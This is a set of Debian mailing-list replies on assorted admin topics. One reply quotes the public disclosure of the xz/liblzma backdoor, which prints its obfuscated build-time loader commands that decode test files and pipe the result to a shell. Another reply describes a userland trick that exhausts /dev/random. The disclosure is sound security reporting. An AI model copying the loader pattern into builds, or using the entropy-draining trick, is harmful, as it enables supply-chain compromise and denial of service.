> [  278.360825] iwlwifi :09:00.0: 0x025B |
> CNVR_SCU_SD_REGS_SD_REG_ACTIVE_VDIG_MIRROR
> --
> unni-debian:~# cat 

Re: Lightweight Emacs for container?

[Jeffrey Walton]

On Mon, May 6, 2024 at 6:45 PM Dr. Jennifer Nussbaum 
wrote:

> I usually use Emacs on full-blown Debian distributions, so I don't pay
> much attention to how large it is. But I'm now starting to
> play around with lightweight LXC containers, obviously headless, and would
> like to keep using Emacs in these, but just for basic
> text editing and so forth, I don't need a whole IDE environment. But to my
> surprise, even emacs-nox is a gigantic installation,
> that even wants to pull in MySQL, for heaven's sake.
>
> Is there some package, or a simple workaround, that will allow me to use a
> basic Emacs without all the cruft?
>

To expand on what Stefan said, see <
https://www.emacswiki.org/emacs/EmacsImplementations>.

And you can build it from sources, and really leave out the stuff you don't
want: .

Jeff

Re: Zoom in the official repo is outdated

[Jeffrey Walton]

On Wed, Apr 24, 2024 at 7:13 PM Van Snyder  wrote:

> On Wed, 2024-04-24 at 16:42 -0300, Luiz Romário Santana Rios wrote:
>
> Hello,
>
>
> (Please cc me when replying as I'm not subscribed to the list)
>
>
> Earlier this month, I noticed I was no longer able to login to Zoom
>
> meetings using the client installed from the Debian repos. In order to
>
> join meetings, I had to uninstall it then install the flatpack Zoom package.
>
>
> I think it should either be updated or outright removed in favor of the
>
> flatpack version. What do you think? Should I report a bug?
>
>
> I was expected to use zoom for a meeting. The zoom app didn't work at all
> in Debian 10, completely refusing even to open a window. I at first started
> with the zoom support in Firefox, but it didn't have a button to select
> high resolution for the camera, so the meeting host asked me to run in the
> app.
>
> I re-opened the session on a different computer that is running Debian 12.
> The app worked OK on that computer.
>

Related, if you control the venue, then you might consider using Jitsi.
Jitsi is open source, and it does not have the obscene terms of service
that companies like Google, Microsoft and Zoom push onto people using their
service. With Jitsi, your meeting data is yours. It is not used internally
for other products, and it is not shared with partners like the Big Tech
companies do.

And last but not least, Zoom is not trustworthy. The company will lie to
users until the cows come home. It was so bad the FCC had to sue them to
get the company to stop. That's saying something when the FCC moves against
a company. The FCC is captured, and the regulatory body rarely moves
against any company.

Jeff

Re: Debian@IBMx3550

[Jeffrey Walton]

On Tue, Apr 23, 2024 at 5:35 PM Greg  wrote:

> Hi there,
>
> I got refurb IBM x3550 M3 7944 server and I'm a bit lost. Is there any
> Linux/Debian software (some gui would be nice) to monitor fan speed,
> temperatures, voltages, disks.. ?
>

I believe the package you are looking for is lm-sensors.

Jeff

Re: Subject: Glitchy sound in Steam games after hard drive upgrade

[Jeffrey Walton]

On Mon, Apr 22, 2024 at 5:03 AM Charlie Gibbs  wrote:

> I should probably be posting this to the Steam forums, but
> most of the denizens there are Windows people so I might be
> better off letting you Debian gurus have a go at it first.
>
> TL;DR: Copying an existing /home into a fresh Debian installation
> causes audio in Steam games to glitch - but all other sound is OK.
>
> Full description:
>
> I have a machine in the living room that stores MP3s and videos
> and serves them to other machines on our network as well as playing
> them locally on our TV's big screen.  I also play a few Steam games
> (e.g. Portal) on it.  It's a 2007-vintage machine, but it has 8GB
> of RAM and enough CPU power to do the job, and runs the latest
> version of Bookworm.
>
> Recently I decided to upgrade its storage capacity, and replaced
> its 500GB hard drive (which was pretty large at the time I bought
> it) with a 4TB drive.  I did an install from scratch using a
> network install CD, then copied my /home partition (using rsync)
> from the old drive.  Everything works great with one exception:
> when I fire up Portal the sound gets glitches about once a second.
> This only happens with Steam games; I can play MP3s and videos
> with mpv and the sound is perfect, as it is when watching YouTube
> videos.  If I swap the old drive back in everything is fine.
>
> Obviously my Steam programs and configuration files are in my
> home directory, since the updated system comes up icons and all
> without re-installing Steam, and can find everything it needs to
> run the games.  But perhaps there are a few files somewhere else
> (/usr?) containing information critical to audio for Steam.
>
> Any ideas?
>

What are the old and new hard drive model numbers and specs?

If the old hard drive was spinning rust, it is acceptable to replace it
with a solid state drive. I did it several times in the past. But nowadays
a new machine usually (always?) comes with a SSD, so you usually don't need
to upgrade for performance reasons.

Re: inconsistency in the symlinks under /etc/systemd

[Jeffrey Walton]

On Wed, Apr 10, 2024 at 7:00 AM Vincent Lefevre  wrote:
>
> On one machine, I have
>
> lrwxrwxrwx 1 root root 35 2023-10-07 13:43:24 
> /etc/systemd/system/sockets.target.wants/dm-event.socket -> 
> /lib/systemd/system/dm-event.socket
>
> and on another one, I have
>
> lrwxrwxrwx 1 root root 39 2024-01-05 16:54:09 
> /etc/systemd/system/sockets.target.wants/dm-event.socket -> 
> /usr/lib/systemd/system/dm-event.socket
>
> These symlinks were created at Debian installation time, and in
> both cases, the dmeventd version is 2:1.02.196-1+b1.
>
> Shouldn't the system ensure that symlinks are consistent on different
> machines (even though the above symlinks are equivalent), for instance
> to ease the comparison of configurations between machines?
>
> For instance, shouldn't usr-is-merged convert the symlinks to a
> canonical path?

Be careful of fiddling with the Systemd symlinks. If you convert the
relative ones to absolute ones, then the machine will fail to boot.

Jeff

Re: Debian 12.5: pigz 2.6-1 fails with error message (Upstream issue 111)

[Jeffrey Walton]

On Tue, Apr 2, 2024 at 6:24 PM Chung Jonathan  wrote:
>
> Dear Franco Martelli, dear Thomas Schmitt,
>
> Sorry for the potential duplication. This mail should now also go to the list.
>
> I believe I found the problem which was on my side. I do have libz.so.1.3, 
> since I manually compiled grpc on my machine and this also uses a newer 
> version of zlib appearently. So this is not a Debian problem but rather 
> specific to my setup. A clean install in a VM indeed works as expected.
> Do you still think a bug report is worth it?

Your problem is one that plagues Linux. You compile and link against
one version of a library, and then you runtime link against another
version. This should have been fixed for users a long time ago, but
the folks responsible leave users to suffer it. I consider it a
security bug since essentially random libraries are being loaded at
runtime.

To fix the problem yourself, add an RPATH to your LDFLAGS when
building your program:

-Wl,-rpath=/path/to/expected/libz -Wl,--enable-new-dtags

The loader will encounter the RPATH when loading your executable, and
load the correct library for your program.

Jeff

Re: making Debian secure by default

[Jeffrey Walton]

On Mon, Apr 1, 2024 at 5:55 PM Charles Curley
 wrote:
>
> On Mon, 1 Apr 2024 19:00:29 +
> Andy Smith  wrote:
>
> > In my view a great example of the "people other than me just need to
> > get good" fallacy merged with the group of people predisposed to
> > hate systemd.
> >
> > It could have been any direct or indirect dependency of sshd here.
> > I'm quite sure almost none of them have the required resources and
> > processes to detect something like this.
>
> Easy, now. No-one is attacking systemd, and I don't think anyone wanted
> to start a systemd war. This could also have happened under System V
> initialization.
>
> I have no doubt that this sort of thing has happened in the past, and I
> fully expect it will happen again in the future. However, the defect
> has been caught and repaired. The system for dealing with
> vulnerabilities is working, if not perfectly. The question now is: what
> lessons can we learn from it.

++.

Right now, Linux does not have a classification system to identify
critical projects, or help with resources for those projects. I don't
like using the word "Linux", but I don't know how to describe the
ecosystem.

For critical projects, I'm talking about the cURL, OpenSSL's OpenSSH,
Wget's and Xz's of the world. These are critical to a base Linux
system. When they have a memory bug or a CVE, action needs to be
taken. The free software world does not even know what the list is.
(And I'm not talking about the other useless fodder that shows up in
repos).

Other vulnerable projects include ncurses and libnettle. Ncurses is
run by Thomas Dickey (https://invisible-island.net/). libnettle is run
by Niels Möller (https://www.lysator.liu.se/~nisse/nettle/). Both are
one-man shows with no continuity plans. Dickey does not even run a
public version control system. You have to download his release
tarballs. There's nothing to make pull requests against. If DIckey or
Möller got hit by a bus crossing the street, there would be problems
for years.

Selling support for critical projects does not seem to work. I seem to
recall Werner Koch of GnuPG roughing it when relying on support
contracts to fund a project.

So one of the first steps would be to identify critical projects,
shore up their governance, and then help the project with additional
resources, like a grant and trusted eyeballs.

Jeff

Re: making Debian secure by default

[Jeffrey Walton]

On Mon, Apr 1, 2024 at 4:34 AM Nate Bargmann  wrote:
>
> * On 2024 31 Mar 20:46 -0500, Andy Smith wrote:
> > In the xz case the further you go looking for a root cause the wider
> > the implications are:
> >
> > Q: Why was there a back door in sshd?
> > A: Because some malicious code was linked to it.
> >
> > Q: How did malicious code get linked to it?
> > A: Its lzma dependency was compromised.
>
> From what I have read, lzma is not a direct dependency of openssh.  It
> turns out that it lzma is a dependency of libsystemd and that
> relationship affected openssh.
>
> Jacob Bachmeyer in analysis
> (https://lists.gnu.org/archive/html/automake/2024-04/msg0.html)
> says:
>
> Lastly on this topic, some of the blame for this needs to fall on the
> systemd maintainers and their "katamari" architecture. There is no good
> reason for notifications of daemon startup to pull in liblzma, but using
> libsystemd for that purpose does exactly that, and ended up getting
> xz-utils targeted as a means of getting to sshd without the OpenSSH
> maintainers noticing.
>
> End quote.

It looks like SELinux is a larger problem than Systemd:
. Systemd
already dropped the liblzma dependency, but they did it for a smaller
initram image, and not to reduce attack surface.

Jeff

Re: [oss-security] backdoor in upstream xz/liblzma leading to ssh server compromise

[Jeffrey Walton]

It looks like more analysis has revealed this is a RCE with the
payload in the modulus of a public key: "The payload is extracted from
the N value (the public key) passed to RSA_public_decrypt, checked
against a simple fingerprint, and decrypted with a fixed ChaCha20 key
before the Ed448 signature verification..." Also see
<https://www.openwall.com/lists/oss-security/2024/03/30/36>.

On Fri, Mar 29, 2024 at 1:52 PM Jeffrey Walton  wrote:
>
> Seems relevant since Debian adopted xz about 10 years ago.
>
> -- Forwarded message -
> From: Andres Freund 
> Date: Fri, Mar 29, 2024 at 12:10 PM
> Subject: [oss-security] backdoor in upstream xz/liblzma leading to ssh
> server compromise
> To: 
>
> Hi,
>
> After observing a few odd symptoms around liblzma (part of the xz package) on
> Debian sid installations over the last weeks (logins with ssh taking a lot of
> CPU, valgrind errors) I figured out the answer:
>
> The upstream xz repository and the xz tarballs have been backdoored.
>
> At first I thought this was a compromise of debian's package, but it turns out
> to be upstream.
>
> == Compromised Release Tarball ==
>
> One portion of the backdoor is *solely in the distributed tarballs*. For
> easier reference, here's a link to debian's import of the tarball, but it is
> also present in the tarballs for 5.6.0 and 5.6.1:
>
> https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63
>
> That line is *not* in the upstream source of build-to-host, nor is
> build-to-host used by xz in git.  However, it is present in the tarballs
> released upstream, except for the "source code" links, which I think github
> generates directly from the repository contents:
>
> https://github.com/tukaani-project/xz/releases/tag/v5.6.0
> https://github.com/tukaani-project/xz/releases/tag/v5.6.1
>
>
> This injects an obfuscated script to be executed at the end of configure. This
> script is fairly obfuscated and data from "test" .xz files in the repository.
>
>
> This script is executed and, if some preconditions match, modifies
> $builddir/src/liblzma/Makefile to contain
>
> am__test = bad-3-corrupt_lzma2.xz
> ...
> am__test_dir=$(top_srcdir)/tests/files/$(am__test)
> ...
> sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
>
>
> which ends up as
> ...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "
>   \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1; ...
>
> Leaving out the "| bash" that produces
>
> Hello
> #��Z�.hj�
> eval `grep ^srcdir= config.status`
> if test -f ../../config.status;then
> eval `grep ^srcdir= ../../config.status`
> srcdir="../../$srcdir"
> fi
> export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c
> +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +724)";(xz -dc
> $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c
> +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"
> "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
> World
>
> After de-obfuscation this leads to the attached injected.txt.
>
>
> == Compromised Repository ==
>
> The files containing the bulk of the exploit are in an obfuscated form in
>   tests/files/bad-3-corrupt_lzma2.xz
>   tests/files/good-large_compressed.lzma
> committed upstream. They were initially added in
> https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0
>
> Note that the files were not even used for any "tests" in 5.6.0.
>
>
> Subsequently the injected code (more about that below) caused valgrind 

Re: making Debian secure by default

[Jeffrey Walton]

On Thu, Mar 28, 2024 at 5:17 PM Lee  wrote:
>
> > Hope this helps a little bit.
>
> Yes, it does.  I was hoping for something simple but it's becoming
> clear to me that there's no simple "make Debian secure for dummies"
> checklist to follow.

Robert Morris Sr. has some good advice,
: It is
easy to run a secure computer system. You merely have to disconnect
all dial-up connections and permit only direct-wired terminals, put
the machine and its terminals in a shielded room, and post a guard at
the door.

You may remember his son, Robert Tappan Morris. He's the author of the
Morris worm from the late 1980s.

Jeff

Re: making Debian secure by default

[Jeffrey Walton]

On Wed, Mar 27, 2024 at 8:37 PM Lee  wrote:
>
> I just saw this advisory
>   Escape sequence injection in util-linux wall (CVE-2024-28085)
> https://seclists.org/fulldisclosure/2024/Mar/35
> where they're talking about grabbing other users sudo password.
>
> Apparently the root of the security issue is that wall is a setguid program?
>
> Even more fun is the instructions
>   To make sure the PoC will work, make sure your victim user can
>   actually receive messages. First check that mesg is set to y
>   (`mesg y`). If a user does not have mesg turned on, they are not
>   exploitable.
>
> WTF??  I've never heard of a mesg, but
>   $ which mesg
>   /usr/bin/mesg
>
> So.  There is a program called 'mesg',  hrmmm..
>   man mesg
> ...
>   Traditionally, write access is allowed by default.  However,  as  users
>   become  more  conscious  of various security risks, there is a trend to
>   remove write access by default, at least for the primary  login  shell.
>   To  make  sure  your ttys are set the way you want them to be set, mesg
>   should be executed in your login scripts.
>
> oof.  Are there instructions somewhere on how to make Debian secure by 
> default?

There are Security Technical Implementation Guides (STIG) for Red Hat,
Solaris, SUSE, and Ubuntu. Unfortunately, nothing for Debian. See
.
More generally, for Operating Systems, see
.

Jeff

Re: making Debian secure by default

[Jeffrey Walton]

On Thu, Mar 28, 2024 at 5:07 PM Lee  wrote:
> [...]
> > A more proactive endeavor would be to document known best practices
> > on the wiki.  A quick search found a couple pages that might serve
> > as starting points:
> >
> > https://wiki.debian.org/SecurityManagement
> > https://wiki.debian.org/Hardening  -- says it's for package maintainers
> >
> > Anyone who is serious about such a project probably has a long road ahead
> > of them.
>
> Is there a generally preferred web link checker program for Debian?
> I took a look at
>   https://www.debian.org/doc/manuals/securing-debian-manual/ch04s15.en.html
> and the 4.15. Protecting against buffer overflows section has this bit:
> recompile the source code to introduce proper checks that prevent
> overflows, using the
>  http://www.research.ibm.com/trl/projects/security/ssp/ patch for GCC
> (which is used by
>  http://www.adamantix.org)
>
> http://www.research.ibm.com/trl/projects/security/ssp/ patch gives me
> a connect failed and
> http://www.adamantix.org sends me to a vietnamese tv site??
>
> Seems to me that an easy first step would be to check that all the
> links still work.

Wikipedia changes links to the Wayback Machine once a link goes bad.

Jeff

Re: System hangs at GDM login or a bit later...

[Jeffrey Walton]

On Wed, Mar 27, 2024 at 4:47 PM nimrod  wrote:
>
> I'm having this annoying behaviour from GDM (or something related).
>
> Quite ofter, after the GDM login screen appears, the host freezes completely: 
> every input device is unresponsive, no ssh connection from another host is 
> possible any more, no CTRL+ALT+CANC/F1-F6 is working.
>
> But the same happens also while I'm typing the username or the password, or 
> after the login screen disappears because the login was successful, or even a 
> bit after the dash has appeared at the bottom of the screen.
>
> Looking at boot.log, the last line before the next boot reads "[ OK ] Started 
> gdm.service - GNOME Display Manager".
>
> Looking at syslog instead, the lines are not always the same, but usually 
> there is something like this:
>
> 2024-03-27T17:57:25.479168+01:00 SW-GIULIANO 
> /usr/libexec/gdm-x-session[1831]: (II) Initializing extension RECORD
> 2024-03-27T17:57:25.479455+01:00 SW-GIULIANO 
> /usr/libexec/gdm-x-session[1831]: (II) Initializing extension DPMS
> 2024-03-27T17:57:25.479734+01:00 SW-GIULIANO 
> /usr/libexec/gdm-x-session[1831]: (II) Initializing 
> ext2024-03-27T17:58:25.469753+01:00 SW-GIULIANO systemd-modules-load[394]: 
> Inserted module 'lp'
> 2024-03-27T17:58:25.469853+01:00 SW-GIULIANO kernel: [ 0.00] microcode: 
> microcode updated early to revision 0xf4, date = 2023-02-23
>
> Please note how the third line suddenly ends with "ext", followed immediately 
> by the first line written by the next boot sequence.
>
> The"gdm-x-session" lines above are just the last of a very long list. I can 
> provide other logs if requested.
>
> Any hint would be veri appreciated.

Can you boot to a previous kernel? Hold SHIFT when the BiOS hands off
to Grub to get the Grub menu.

If not, then ... maybe a hardware problem. Start with a memory
checker. Then move on to disabling the GPU.

Jeff

Re: seeding /dev/random from a security key

[Jeffrey Walton]

On Tue, Mar 26, 2024 at 7:12 PM Björn Persson  wrote:
>
> Jeffrey Walton wrote:
> > For what you want to do, and if I am parsing it correctly... I would
> > write a daemon in C [...]
>
> Only in the unlikely case that both RNGD and SCDrand turn out unsuitable
> somehow. Writing and compiling a daemon is no less work than compiling
> an already written daemon.
>
> > The part about extracting the entropy from the source would use
> > OpenSSL or GnuPG. I believe you would compile and link to OpenSSL's
> > libcrypto.{a|so}, or GnuPG's libgcrypt.{a|so}.
>
> RNGD 6 actually uses OpenSC's libp11, where it calls the function
> PKCS11_generate_random, which in turn calls the PKCS #11 function
> C_GenerateRandom.

It sounds like you have it sorted out. Good luck with it.

Jeff

Re: Debian 11 PHP 7.4 – Mysql 8 - Can’t get Mysqli_connect to work

[Jeffrey Walton]

On Tue, Mar 26, 2024 at 1:17 PM Marco Moock  wrote:
>
> Am 26.03.2024 um 10:33:59 Uhr schrieb Bernard:
>
> > I have the two // in the displayed error messages. However the file
> > is where it should be, without double //
>
> The this seems to be a bug because if it searches for //file it will
> definitely not find it.
> Can you use strace to verify that?

Also see .

Jeff

Re: seeding /dev/random from a security key

[Jeffrey Walton]

On Tue, Mar 26, 2024 at 11:52 AM Björn Persson  wrote:
>
> Jeffrey Walton wrote:
> > Out of morbid curiosity, what hardware are the servers using? RDRAND
> > and RDSEED have been available since about 2012, so it is mostly
> > ubiquitous nowadays.
>
> Do you mean I should add to the e-waste pile by throwing away working
> hardware and buy an entire new computer instead of buying a tiny dongle?

No, I was wondering about the server hardware. I would be surprised to
learn of something without Intel's SecureKey nowadays (assuming it is
x86{-64} based).

> > Be careful of rng-tools. It does not do a good job for non-mainstream
> > generators, like VIA's Padlock Security Engine. And rng-tools did not
> > support generators for architectures, like you would find on ARM,
> > aarch64 and PowerPC.
>
> I figure it can be used with devices it supports even if there are some
> other devices it doesn't support – but it looks like I'd have to build
> it from source myself.

Yeah, I've had to do that in the past. You will also (probably) need
to write a systemd unit file or two.

> > OpenSSL and GnuPG should be
> > able to extract the entropy from the card, and then use it to seed
> > /dev/{u}random.
>
> This job requires a daemon. OpenSSL is a library. Or do you mean its
> command-line tool? So how would I tell that to fetch random data
> through PKCS #11?
>
> GnuPG at least has a daemon called scdaemon. Is that what you mean? So
> how would I tell that to fetch random data through PKCS #11 and write
> to /dev/random?

For what you want to do, and if I am parsing it correctly... I would
write a daemon in C to collect the entropy from the source, then
extract the entropy from the bytes, and then insert the entropy into
the system's random number generator. For entropy extraction, take a
look at HKDF and Krawczyk's paper. Krawczyk does a good job of cleanly
separating entropy extraction from later stage key expansion.

The part about extracting the entropy from the source would use
OpenSSL or GnuPG. I believe you would compile and link to OpenSSL's
libcrypto.{a|so}, or GnuPG's libgcrypt.{a|so}. Since this is a daemon
and not a driver, I believe you can use the shared objects.

I eat my own dog food. I've done similar in the past with both an
EntropyKey and custom on-board generator for a MIPS Creator CI-20 with
the jz4780-rng. For the EntropyKey, I did not even bother decrypting
the stream. I stuffed the encrypted stream right into /dev/random,
because the amount of entropy does not change regardless of the
formatting (encrypted vs unencrypted).

And you may find this interesting... Debian suffers entropy depletion
on /dev/random and can hang components that use it, including
/dev/urandom. It is easy for a userland process to do. All you need is
a stock Debian system _without_ an entropy gatherer like Haveged. Have
your program perform a big read on /dev/random with O_NONBLOCK. The
kernel will return every last bit of entropy it has, and then start
blocking processes. The only way to recover in reasonable time is to
run a daemon like Haveged. I reported it to the devs several years
ago, but there was no interest in fixing it.

Jeff

Re: seeding /dev/random from a security key

[Jeffrey Walton]

On Mon, Mar 25, 2024 at 4:33 PM Björn Persson  wrote:
>
> In a quest to acquire hardware random number generators for seeding
> /dev/random on servers that lack a built-in entropy source, I'm
> investigating how random data can be obtained from a security key such
> as a Nitrokey, Yubikey or a similar device.

Out of morbid curiosity, what hardware are the servers using? RDRAND
and RDSEED have been available since about 2012, so it is mostly
ubiquitous nowadays.

> RNGD version 6 from https://github.com/nhorman/rng-tools can fetch
> random data through a PKCS #11 interface, but the two versions of RNGD
> in Debian seem to lack that ability. Debian has rng-tools5 and
> rng-tools-debian, but not Neil Horman's version 6. Or am I just failing
> to find it?

Be careful of rng-tools. It does not do a good job for non-mainstream
generators, like VIA's Padlock Security Engine. And rng-tools did not
support generators for architectures, like you would find on ARM,
aarch64 and PowerPC.

> SCDrand from https://incenp.org/dvlpt/scdtools.html can also obtain
> random data from a "smartcard"-compatible device, but I don't find that
> in Debian either.
>
> Does anyone know of another way to obtain random data from devices of
> this kind?

PKCS#11 is a standard interface. If the card provides a generator,
then the code is the same for all cards. OpenSSL and GnuPG should be
able to extract the entropy from the card, and then use it to seed
/dev/{u}random.

But keep in mind ... the kernel crypto folks effectively deprecated
/dev/random, and recommend using /dev/urandom for your random bits. Or
use getrandom(2). See .

Jeff

Re: Debian 11 PHP 7.4 – Mysql 8 - Can’t get Mysqli_connect to work

[Jeffrey Walton]

On Sun, Mar 24, 2024 at 5:57 PM Bernard  wrote:
>
> Hi to Everyone !
>
> PHP Warning: PHP Startup: Unable to load dynamic library 
> '//usr/lib/php/20190902/mysqli.so' However, the file is there... not human 
> readable as expected and mysqli_connect doesn't operate.

Please provide the output of `ls -Al /usr/lib/php` and `ls -Al
/usr/lib/php/20190902`. If you are running SeLinux, then use `ls -AlZ`
instead.

Also state what user your web server runs under.

You may need to show your php.ini.

Jeff

Re: How does the 64bits time_t transition work?

[Jeffrey Walton]

On Wed, Mar 20, 2024 at 4:23 AM Brad Rogers  wrote:
>
> On Wed, 20 Mar 2024 08:22:16 +0100
> Detlef Vollmann  wrote:
>
> >Is there a description anywhere how the 64bit time transition works?
>
> I'm far from an expert, but from what I've read, this transition is
> *huge*.  Possibly the largest that has ever occurred in Debian.  It's
> going to take time to get it done.  Lots, and lots, of time.  In the
> meanwhile, it means a good deal of disruption in Sid/unstable.
>
> You should already be aware that running sid comes with certain
> difficulties, and if you're not prepared/willing to deal with them then,
> in all likelihood, Sid isn't for you.

Some folks don't have a choice. To run Debian ports in a Debian
QEMU/Chroot, you have to run Unstable in the guest. You cannot run
Stable or Testing in the guest.

I guess the other choice is to forgo testing on various Debian
architectures. But that seems like a worse choice for everyone
involved. Personally, I would not feel good about this path. I don't
want Debian users and Debian packagers to experience problems I should
have caught during testing.

> Following Marco's advice would be a good first step, IMO.

I don't think this migration was planned well. Debian should have
created a temporary *-t64 port, and then released the appropriate
ISOs. Later, when things got stable, the *-t64 port could have been
merged back into the standard port all at once.

Jeff

Re: Root password strength

[Jeffrey Walton]

On Wed, Mar 20, 2024 at 2:34 PM Pierre-Elliott Bécue  wrote:
>
> Jeffrey Walton  wrote on 20/03/2024 at 19:16:16+0100:
>
>  [...]
> >> Noone asks someone to remember more than two or three passwords. The
> >> rest belongs to a password manager.
> >
> > Huh? This is discussed in detail in Peter Gutmann's Engineering
> > Security, <https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf>,
> > Chapter 7. In particular, pages 565-567 discussed the Selfish Security
> > Model.
>
> And because it's discussed in an irrelevant pdf means it's what one asks
> in this thread?

I don't think I would call Gutmann's book on Security Engineering "irrelevant."

Gutmann earned his PhD in Security Usability. He's written two books
on the subject. He also wrote a book on Security Engineering (cited
above). He participates in IETF Working Groups, and has authored a few
RFCs. I would not make the mistake of dismissing his work as
irrelevant.

> Do you want to also bring in security practices from the 80's?

Jeff

Re: Root password strength

[Jeffrey Walton]

On Wed, Mar 20, 2024 at 1:45 PM Pierre-Elliott Bécue  wrote:
>
>
> Jeffrey Walton  wrote on 20/03/2024 at 18:30:34+0100:
>
> > On Wed, Mar 20, 2024 at 12:51 PM Pierre-Elliott Bécue  
> > wrote:
> >>
> >> Jeffrey Walton  wrote on 20/03/2024 at 17:19:46+0100:
> >>
> >> > On Wed, Mar 20, 2024 at 12:09 PM Pierre-Elliott Bécue  
> >> > wrote:
> >> >>
> >> >> John Hasler  wrote on 20/03/2024 at 16:58:01+0100:
> >> >>
> >> >> > Pierre-Elliott Bécue writes:
> >> >> >> A phrase you will easily remember but that would be hardcore to guess
> >> >> >> through social engineering is perfect.
> >> >> >
> >> >> > Better is a random string that you write down.  When people try to
> >> >> > generate phrases that meet those requirements they usually fail.
> >> >>
> >> >> Writing down a password is a bad idea.
> >> >
> >> > I don't think that's true anymore. The threat being mitigated is the
> >> > network attacker. The network attacker cannot (yet) reach through a
> >> > monitor and read a sticky note.
> >>
> >> Mitigating a specific threat by adding a new one is not a proper way to
> >> handle a threat when one can avoid both.
> >
> > What does your threat model look like?
>
> My home sees plenty different people coming in. Some I trust, some I
> trust less. Also videocalls is a nice way to get a paper password
> recorded (and yes it happens).

So now you are arguing someone jumps on a Zoom call, and then displays
their passwords to the camera. If we are going to use far-fetched
examples, then write the password down with invisible ink. Recover it
when needed using the special pen provided with the junior spy kit.

> Same goes for company.

Companies generally have physical security on their assets. No one is
going to wander in the server room unsupervised. No one is going to
wander the cubicles lifting mouse pads and looking through drawers
without raising suspicion.

If someone is allowed to do those things, then the company's controls
are not going to be very helpful, and the company has bigger problems.

> > Are spouses who go through a purse or wallet to retrieve a company
> > password a threat in your model? If that's the case, then you have
> > compensating controls to mitigate the threat, like physical security
> > on the office workspace.
> >
> >> > It is also why its Ok for a system to generate a list of recovery
> >> > codes, and have the user print them and store them in a safe place.
> >> > The other option are those cursed security questions, which have been
> >> > insecure for about 20 years now (but developers have their arms
> >> > wrapped around).
> >>
> >> A recovery code is generally designed to troubleshot 2FA issues, not as
> >> a replacement for the first layer of security that a password is.
> >
> > I believe recovery codes to regain access to an account due to a lost
> > or forgotten password predates 2FA. Most businesses I've worked with
> > use a Self-Service scheme, like recovery codes, to avoid the Help Desk
> > call. Some use the cursed security questions.
>
> Yes, but in that case there's another point, which is a contact mail
> address.
>
> And even this way it's problematic.
>
> > I am aware some European banks use Temporary Access Numbers (TANs) as
> > a form of 2FA. (I've never seen them used in the US). Each month a
> > [new] TAN is included with the printed and mailed account statement.
> > The "postal channel" is considered reasonably secure. Again, the
> > threat being mitigated is the network attacker, not a nosy spouse.
>
> Again, trying to mitigate one threat by creating a full range of other
> threats is the receipe for disaster.

I think you are throwing the baby out with the bathwater. Taking a big
problem (the network attacker) and reducing it to a smaller problem
(securing recovery codes) reduces risk.

I read about account compromises all the time. The creative ones use
SIM swaps to circumvent 2FA. I can't remember an instance of an
account compromise because a thief stole a wallet or safe.

> >> And therefore if it were to circuvent this first layer, then no, it's
> >> not ok to print them, except if you indeed have a safe.
> >>
> >> But in general it's a better approach to avoid having to resort to
> >> printed password on a paper.
> >
> > Humans are human. We have to understand their psychology and
> > limitations. Part of that is realizing

Re: Root password strength

[Jeffrey Walton]

On Wed, Mar 20, 2024 at 12:51 PM Pierre-Elliott Bécue  wrote:
>
> Jeffrey Walton  wrote on 20/03/2024 at 17:19:46+0100:
>
> > On Wed, Mar 20, 2024 at 12:09 PM Pierre-Elliott Bécue  
> > wrote:
> >>
> >> John Hasler  wrote on 20/03/2024 at 16:58:01+0100:
> >>
> >> > Pierre-Elliott Bécue writes:
> >> >> A phrase you will easily remember but that would be hardcore to guess
> >> >> through social engineering is perfect.
> >> >
> >> > Better is a random string that you write down.  When people try to
> >> > generate phrases that meet those requirements they usually fail.
> >>
> >> Writing down a password is a bad idea.
> >
> > I don't think that's true anymore. The threat being mitigated is the
> > network attacker. The network attacker cannot (yet) reach through a
> > monitor and read a sticky note.
>
> Mitigating a specific threat by adding a new one is not a proper way to
> handle a threat when one can avoid both.

What does your threat model look like?

Are spouses who go through a purse or wallet to retrieve a company
password a threat in your model? If that's the case, then you have
compensating controls to mitigate the threat, like physical security
on the office workspace.

> > It is also why its Ok for a system to generate a list of recovery
> > codes, and have the user print them and store them in a safe place.
> > The other option are those cursed security questions, which have been
> > insecure for about 20 years now (but developers have their arms
> > wrapped around).
>
> A recovery code is generally designed to troubleshot 2FA issues, not as
> a replacement for the first layer of security that a password is.

I believe recovery codes to regain access to an account due to a lost
or forgotten password predates 2FA. Most businesses I've worked with
use a Self-Service scheme, like recovery codes, to avoid the Help Desk
call. Some use the cursed security questions.

I am aware some European banks use Temporary Access Numbers (TANs) as
a form of 2FA. (I've never seen them used in the US). Each month a
[new] TAN is included with the printed and mailed account statement.
The "postal channel" is considered reasonably secure. Again, the
threat being mitigated is the network attacker, not a nosy spouse.

> And therefore if it were to circuvent this first layer, then no, it's
> not ok to print them, except if you indeed have a safe.
>
> But in general it's a better approach to avoid having to resort to
> printed password on a paper.

Humans are human. We have to understand their psychology and
limitations. Part of that is realizing a user cannot possibly remember
all the passwords required in the internet age. A big part of the
problem is what is known as the "Selfish Security Model for Password
Authentication." Each website wants a user to have an account and
manage a password. It is an impossible feat for folks to accomplish,
and that's why problems like password reuse across security domains
happens.

> >> Managing passwords through a password-store (eg pass, keepassxc,
> >> whatever tool you prever) is a great idea, but you first need to unlock
